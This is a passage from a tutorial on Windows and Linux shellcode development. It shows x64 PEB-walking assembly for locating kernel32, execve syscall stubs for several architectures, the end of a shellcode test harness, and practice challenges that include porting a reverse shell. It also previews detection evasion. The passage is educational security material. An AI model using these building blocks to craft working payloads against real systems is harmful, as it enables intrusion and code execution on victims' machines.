        sys.exit(1)
    binary_path = sys.argv[1]
    test_executable = test_shellcode(binary_path)
    if test_executable:
        print(f"Test executable created: {test_executable}")
        print("Run it to test your shellcode!")
Advanced Platform-Specific Techniques
Windows Advanced: 64-bit Considerations
64-bit Windows shellcode requires different techniques:
- Different Registers: Use GS:[0x60] instead of FS:[0x30] for PEB access
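- Different Calling Convention: The Microsoft x64 convention passes the first four integer arguments in RCX, RDX, R8, and R9; any further arguments go on the stack
- Shadow Space: The caller must reserve 32 bytes of shadow space on the stack for every call and keep RSP 16-byte aligned at the point of the call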
- Different Structures: PEB and TEB layouts differ in 64-bit
; 64-bit Windows PEB Walk
find_kernel32_x64:
    xor rax, rax
    mov rax, [gs:rax + 0x60] ; RAX = PEB (TEB at GS, PEB pointer at offset 0x60)
    mov rax, [rax + 0x18]    ; PEB->Ldr
    mov rax, [rax + 0x20]    ; InMemoryOrderModuleList.Flink: first entry (the executable)
    mov rax, [rax]           ; Second entry (ntdll.dll)
    mov rax, [rax]           ; Third entry (kernel32.dll, by the usual load order)
    mov rax, [rax + 0x20]    ; DllBase (0x20 past InMemoryOrderLinks in 64-bit)
    ret
Linux Advanced: System Call Variations
Different Linux architectures use different system call mechanisms:
; x86-64 system calls (modern)
mov rax, 59 ; execve
syscall ; Use syscall instruction
; i386 system calls (legacy)
mov eax, 11 ; execve (different number!)
int 0x80 ; Use interrupt
; ARM system calls
mov r7, #11 ; execve
svc #0 ; Supervisor call
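Pro Tip: Always check the target architecture's system call numbers and calling conventions. On Linux the numbers are stable within an architecture but differ between architectures (execve is 59 on x86-64 and 11 on i386), and each architecture passes arguments in its own set of registers.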
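When working across architectures, it can help to keep the conventions in one lookup table instead of relying on memory. The sketch below records execve for the three architectures shown above. The structure and the names `EXECVE` and `describe` are illustrative; the ARM entry assumes the 32-bit EABI convention.

```python
# execve conventions for the architectures discussed in this section.
EXECVE = {
    "x86_64": {"number": 59, "trap": "syscall",
               "number_reg": "rax", "arg_regs": ("rdi", "rsi", "rdx")},
    "i386":   {"number": 11, "trap": "int 0x80",
               "number_reg": "eax", "arg_regs": ("ebx", "ecx", "edx")},
    "arm":    {"number": 11, "trap": "svc #0",
               "number_reg": "r7", "arg_regs": ("r0", "r1", "r2")},
}


def describe(arch):
    """Summarise how execve(path, argv, envp) is invoked on `arch`."""
    conv = EXECVE[arch]
    path, argv, envp = conv["arg_regs"]
    return (f"{arch}: {conv['number_reg']}={conv['number']}, "
            f"path in {path}, argv in {argv}, envp in {envp}, "
            f"then {conv['trap']}")


for arch in EXECVE:
    print(describe(arch))
```

The authoritative source for any architecture not listed here is the kernel's system call table for that architecture and the syscall(2) manual page.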
Mastery Achieved: What's Next?
Congratulations! You now understand the fundamental differences between Windows and Linux shellcode development. You've learned:
- ✅ Windows PEB walking and API resolution techniques
- ✅ Linux direct system call methodology
- ✅ Platform-specific function calling conventions
- ✅ Complete working examples for both platforms
- ✅ Professional testing and debugging frameworks
- ✅ Advanced 64-bit and architecture considerations
Ready for the Final Challenge? In the next article, we'll explore advanced techniques including encoding methods to evade detection, polymorphic shellcode generation, and the cat-and-mouse game between attackers and defenders.
Practice Challenges
- Cross-Platform Port: Take the Linux reverse shell and create a Windows equivalent
- Size Optimization: Create the smallest possible execve shellcode for Linux
- API Explorer: Write Windows shellcode that enumerates all functions in kernel32.dll
- System Call Tracer: Create Linux shellcode that traces its own system calls
Remember: These techniques are powerful tools for security research and defense. Always use them ethically and only in authorized environments.